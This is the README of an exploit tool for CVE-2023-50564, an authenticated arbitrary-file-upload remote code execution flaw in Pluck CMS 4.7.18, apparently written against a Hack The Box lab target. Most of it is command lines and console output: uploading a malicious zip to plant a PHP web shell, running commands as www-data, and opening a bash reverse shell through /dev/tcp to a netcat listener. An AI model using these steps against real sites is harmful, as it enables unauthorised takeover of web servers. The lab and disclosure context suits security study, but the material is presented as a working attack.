## https://sploitus.com/exploit?id=BC069992-9BB4-55E9-97F8-87B7C7881EBA
# CVE-2023-50564
CVE-2023-50564 is an RCE vulnerability in Pluck CMS v4.7.18. It is made possible through an arbitrary file upload vulnerability in the `/inc/modules_install.php` component allowing to execute arbitrary code by uploading a malicious `.zip` file.
# Usage
Before running the exploit, the password to authenticate on `/login.php` needs to be known.
Running the exploit against the target:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
```
The malicious `.php` file can be accessed via the link provided by the script to execute commands.
Optionally commands to be executed can be specified using the `--cmd` flag.
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd id
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
## Reverse Shell
Start the listener, then specify a command to establish a reverse shell connection on the listener using the `--cmd` flag:
```console
$ python3 exploit.py --target http://greenhorn.htb --password iloveyou1 --cmd "bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
[+] Creating payload malicious.zip
[+] Logging in
[+] Login successful
[+] Uploading malicious.zip
[+] Upload successful
[+] Access web shell at http://greenhorn.htb/data/modules/malicious/malicious.php?cmd=<COMMAND>
[+] Executing command 'bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1''
```
And get connection on listener:
```console
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.78.209] 38982
bash: cannot set terminal process group (1003): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/malicious$
```
# Installation
Install the requirements:
```
pip install -r requirements.txt
```
Help:
```console
$ python3 exploit.py --help
usage: exploit.py [-h] --target TARGET --password PASSWORD [--cmd CMD]
Exploit Pluck v4.7.18 RCE Vulnerability
options:
-h, --help show this help message and exit
--target TARGET Target URL (Example: http://greenhorn.htb)
--password PASSWORD Pluck password
--cmd CMD Command to execute
```
# Credits
Credits to `Mirabbas Ağalarov` for discovering the vulnerability ([Link](https://www.exploit-db.com/exploits/51592)).